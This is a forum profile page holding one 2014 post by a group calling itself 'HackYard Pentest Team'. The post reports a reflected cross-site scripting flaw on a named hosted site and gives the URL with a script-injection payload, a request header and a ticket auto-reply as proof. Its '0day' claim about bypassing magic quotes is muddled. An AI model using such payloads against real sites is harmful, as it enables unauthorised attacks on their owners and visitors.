Jump to content

HackYard_Pentest_Team

Members
  • Posts

    1
  • Joined

  • Last visited

Everything posted by HackYard_Pentest_Team

  1. HackYard Pentest Team Author : Pentest-Team of Hackyard Security Group Raported: 04.feb.2014 Today 00:17 Resolved Issue : ?.?.???? ??:?? Issue: Cross-site scripting (reflected) Severity: Critical Confidence: Certain 0day bypass:This filter replace ' with \' and " with \" so HackYard Pentest Team found 0day in this php function known as "magicquotes" to make successful cross side scripting. Host:Web hosting, domain names, VPS - 000webhost.com Path: /bank.php?pro="><script>alert(/HackYard-Pentest-Team!/)</script> Reguest in get parameter: Host: pakistan-gov-biz-tk.comxa.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive POC : First mail delivered by "pakistanhackteam@legit.biz.tk". This is an automatic response. Referral was submitted pakistan technical department and you will be contacted as soon as possible by a system administrator. If you want to return the details of the complaints please keep the message the same subject, topic including ticket number associated. *** Ticket ID: nwmn-3949-394983 *** Subject: [Cross-Side-Scripting] pakistan-gov-biz-tk.comxa.com/ REPORT *** Department: Technical Dept. *** Type: sensing technique *** Status: Open
×
×
  • Create New...